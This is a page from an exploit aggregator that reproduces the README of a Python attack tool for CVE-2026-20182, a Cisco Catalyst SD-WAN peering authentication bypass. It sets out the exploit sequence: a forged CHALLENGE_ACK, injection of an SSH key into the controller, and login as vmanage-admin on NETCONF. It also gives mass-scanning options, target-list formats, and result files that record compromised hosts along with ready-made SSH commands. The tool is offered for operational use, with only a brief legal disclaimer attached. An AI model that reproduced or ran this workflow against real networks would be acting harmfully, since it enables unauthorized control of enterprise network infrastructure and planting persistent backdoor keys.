Share
## https://sploitus.com/exploit?id=5E018311-5338-53E4-A443-92BBE3A551B9
# CVE-2026-20182
Cisco Catalyst SD-WAN Peering Authentication Bypass
# CVE-2026-20182 โ Cisco Catalyst SD-WAN Peering Authentication Bypass
**Assessment tool for authorized testing of Cisco Catalyst SD-WAN Controller / Manager peering authentication bypass (CVE-2026-20182).**
| | |
|---|---|
| **CVE** | CVE-2026-20182 |
| **Severity** | **Critical (CVSS 10.0)** |
| **CVSS 3.1** | `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` |
| **Product** | Cisco Catalyst SD-WAN Controller (formerly vSmart) ยท Cisco Catalyst SD-WAN Manager (formerly vManage) |
| **Issue** | Peering authentication mechanism not enforced correctly |
| **Script** | **`CVE-2026-20182.py`** |
---
## Vulnerability Summary
**May 2026 advisory:** A flaw in **control-connection handshaking / peering authentication** allows an **unauthenticated remote attacker** to bypass authentication and obtain **high-privileged internal access** on affected systems.
An attacker sends **crafted requests** to the affected system. On success, the attacker may authenticate as an **internal, high-privileged, non-root** account and reach **NETCONF**, enabling manipulation of SD-WAN fabric configuration.
| Item | Detail |
|------|--------|
| **Attack vector** | Network |
| **Privileges required** | None |
| **User interaction** | None |
| **Scope** | Changed |
| **Impact** | Confidentiality, integrity, and availability โ **High** |
**Recommendation:** Apply Cisco security fixes per official vendor guidance. Restrict management plane exposure, monitor control-plane connections, and audit SD-WAN controllers for unauthorized configuration changes.
---
## Contact
**Telegram:** [@KNxploited](https://t.me/KNxploited)
---
## Console Preview
Place your screenshot at **`https://github.com/Nxploited/CVE-2026-20182/blob/main/Nx.png`** (recommended **1200ร700** or similar 16:9).
*If the image is missing, add `docs/usage_console.png` before publishing the repository.*
---
## Tool: `CVE-2026-20182.py`
Python 3 exploit framework for **CVE-2026-20182** against Cisco SD-WAN **vdaemon** (UDP/DTLS **12346**).
### What it does (step by step)
| Step | Phase | Description |
|------|--------|-------------|
| **1** | **Load targets** | Parse `targets.txt`, merge duplicates by `(host, domain_id, site_id)` |
| **2** | **OpenSSL preflight** | Load **OpenSSL 3.x/4.x** shared libraries for custom DTLS |
| **3** | **DTLS connect** | Connect to target UDP port (always **12346** first, then optional list ports) |
| **4** | **CHALLENGE** | Receive server `CHALLENGE` (0x08) |
| **5** | **CHALLENGE_ACK** | Send crafted `CHALLENGE_ACK` as **vHub (type 2)** โ authentication bypass |
| **6** | **Hello** | Complete `Hello` exchange โ confirms bypass path |
| **7a** | **CHECK mode** | Stop here โ record **bypass / Hello OK** only (no keys, no SSH) |
| **7b** | **FULL mode** | Inject SSH public key via `VMANAGE_TO_PEER` |
| **8** | **Inject ACK** | Expect `REGISTER_TO_VMANAGE` (0x0D) as protocol acknowledgment |
| **9** | **SSH verify** | Test login as `vmanage-admin` on TCP **830** (NETCONF), optional **22** |
| **10** | **Output** | Sort findings into tier files + human-readable command list |
**Fabric fallback:** On `TEAR_DOWN` or param mismatch, retries alternate **domain/site** presets `(1,100)`, `(1,1)`, `(0,0)` unless `--no-fallback`.
---
## Result Tiers (read carefully)
| Tier | File | Meaning |
|------|------|---------|
| **01 โ Confirmed SSH** | `cisco_sdwan_01_confirmed_ssh.jsonl` | **`ssh_verified=true`** โ only tier treated as full compromise proof |
| **02 โ Inject ACK only** | `cisco_sdwan_02_inject_ack_only.jsonl` | Protocol accepted key inject; **SSH login failed** |
| **03 โ Bypass only** | `cisco_sdwan_03_bypass_only.jsonl` | Hello/bypass OK; **no confirmed inject** |
**Important**
- **`check` mode** โ tier **03** at best (bypass probe). **Not** full exploitation proof.
- **`full` mode** โ aim for tier **01** (`ssh_verified`).
- **`https://host` in list** โ **TCP web hint only** (80/443). **Not** UDP DTLS on 443.
---
## Requirements
| Requirement | Notes |
|-------------|--------|
| **Python** | 3.9+ |
| **pip** | `cryptography`, `rich` |
| **OpenSSL** | **3.x or 4.x** shared libs (`libssl` + `libcrypto`) โ **mandatory** |
```bash
pip install -r requirements.txt
```
### OpenSSL (system)
**Windows**
1. Install [Win64 OpenSSL 3.x](https://slproweb.com/products/Win32OpenSSL.html) or equivalent
2. Add `bin\` to **PATH**, or set:
```text
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64
```
**Linux**
```bash
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH
```
The tool **exits at startup** if OpenSSL cannot be loaded.
---
## Quick Start
### Interactive menu (default)
```bash
python CVE-2026-20182.py
```
- Configure options **1โ11**, then **`0` = LAUNCH SCAN**
- Default run mode: **`check`** (safe bypass probe)
### Non-interactive (automation)
```bash
python CVE-2026-20182.py -y
```
---
## Run Modes
| Mode | Flag | SSH inject | SSH verify | Use when |
|------|------|------------|------------|----------|
| **CHECK** | `--mode check` (default) | **No** | **No** | Mass screening, bypass detection |
| **FULL** | `--mode full` | **Yes** | **Yes** (unless `--no-ssh-verify`) | Proof of compromise |
**CHECK โ bypass probe only**
```bash
python CVE-2026-20182.py -y --mode check
```
**FULL โ inject key + verify SSH (authorized targets only)**
```bash
python CVE-2026-20182.py -y --mode full
```
---
## CLI Reference (every flag + example)
### Targets & workers
**`-f` / `--file`** โ targets list (default: `targets.txt`)
```bash
python CVE-2026-20182.py -y -f my_controllers.txt --mode check
```
**`-t` / `--threads`** โ worker threads (1โ200, default **12**)
```bash
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check
```
**`--domain`** โ default `DOMAIN_ID` when not in list (default: **1**)
```bash
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check
```
**`--site`** โ default `SITE_ID` when not in list (default: **100**)
```bash
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full
```
---
### Mode & automation
**`--mode`** โ `check` \| `full`
```bash
python CVE-2026-20182.py -y --mode full -f targets.txt
```
**`-y` / `--yes`** โ skip interactive menu; use CLI values only
```bash
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20
```
---
### SSH verification
**`--no-ssh-verify`** โ skip post-inject SSH test (not recommended in full mode)
```bash
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt
```
**`--verify-ssh22`** โ also try TCP **22** after **830**
```bash
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt
```
---
### UDP / fabric
**`--no-try-list-udp`** โ only UDP **12346**; ignore `:port` from list
```bash
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check
```
**`--extra-udp-ports`** โ lab: extra UDP ports on every host
```bash
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check
```
**`--no-fallback`** โ disable domain/site retry on `TEAR_DOWN`
```bash
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full
```
---
### Logging
**`-v` / `--verbose`** โ log each protocol TX/RX message
```bash
python CVE-2026-20182.py -y -v -f targets.txt --mode check
```
---
## Interactive Menu (when `-y` is omitted)
| # | Option |
|---|--------|
| **1** | Targets file |
| **2** | Worker threads |
| **3** | Default DOMAIN_ID |
| **4** | Default SITE_ID |
| **5** | Mode: `check` / `full` |
| **6** | Fabric auto-retry on TEAR_DOWN |
| **7** | Verbose protocol log |
| **8** | SSH verify after inject |
| **9** | Also verify SSH :22 |
| **10** | Try explicit list UDP ports |
| **11** | Extra UDP ports (lab) |
| **12** | Show list format help |
| **0** | **โถ LAUNCH SCAN** |
---
## `targets.txt` Format
One target per line. Lines starting with `#` are ignored.
| Format | Example | Behavior |
|--------|---------|----------|
| IP / hostname | `10.0.0.1` | UDP **12346** + defaults domain/site |
| IP + UDP port | `10.0.0.2:12346` | Also try list UDP port |
| IP + port + domain + site | `10.0.0.3:12346:1:100` | Full fabric tuple |
| HTTPS URL | `https://10.0.0.4` | Host + **TCP 443 hint only** (not UDP/443) |
| HTTP URL | `http://10.0.0.5` | **TCP 80 hint only** |
| UDP URL | `udp://10.0.0.6:12346` | Explicit UDP |
| Tab/comma separated | `10.0.0.7 12346 1 100` | Same as four-field form |
| Key=value | `10.0.0.8;port=12346;domain=1;site=100` | Semicolon KV syntax |
**Example file**
```text
# Lab controllers โ authorized only
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1
```
**Not supported:** IPv6 (IPv4 / hostname only).
---
## Output Files
| File | Content |
|------|---------|
| `cisco_sdwan_results.jsonl` | Raw JSON result per attempt |
| `cisco_sdwan_success.txt` | Confirmed SSH lines (tab-separated) |
| `cisco_sdwan_01_confirmed_ssh.jsonl` | Tier 01 โ **verified SSH** |
| `cisco_sdwan_02_inject_ack_only.jsonl` | Tier 02 โ inject ACK, SSH failed |
| `cisco_sdwan_03_bypass_only.jsonl` | Tier 03 โ bypass / Hello only |
| `cisco_sdwan_commands.txt` | Human-readable SSH commands |
| `cisco_sdwan_findings.json` | Session summary + counts |
| `sdwan_keys/` | Generated private keys (full mode) |
**Example SSH command (tier 01)**
```bash
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" vmanage-admin@10.10.10.1 -p 830 -N
```
---
## Recommended Workflows
### 1) Screen many hosts (fast)
```bash
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24
```
Review `cisco_sdwan_03_bypass_only.jsonl` and live stats **Bypass only**.
### 2) Confirm exploit on shortlisted hosts
```bash
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8
```
Review **`cisco_sdwan_01_confirmed_ssh.jsonl`** โ only file with **`ssh_verified: true`**.
### 3) Debug single host (verbose)
```bash
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback
```
---
## Live Telemetry (during scan)
| Counter | Meaning |
|---------|---------|
| **Progress** | Targets completed / total |
| **SSH verified** | Tier 01 count |
| **Inject ACK** | Tier 02 count |
| **Bypass only** | Tier 03 count |
| **Failed** | Errors / no bypass |
---
## Operational Notes
- **Default mode is `check`** โ does not write keys or prove SSH by itself.
- **Real success** = `ssh_verified=true` in **`full`** mode only.
- **Patched / wrong fabric** โ often `TEAR_DOWN` after `CHALLENGE_ACK`; enable fabric fallback or fix domain/site in list.
- **Firewall** must allow **UDP/12346** (and any extra list UDP ports) from your scanner to the controller.
- **Do not commit** `sdwan_keys/` or scan results to public repositories.
---
## Legal Disclaimer
This software is for **authorized security research, defensive assessment, and education** only.
You must have **explicit written permission** to test any system you do not own or operate. Unauthorized access to computer systems is illegal. The author is not responsible for misuse, damage, or legal consequences arising from use of this tool.
Use only on systems and networks where you are explicitly authorized to perform security testing.
---
**By: Nxploited ( Khaled Alenazi )**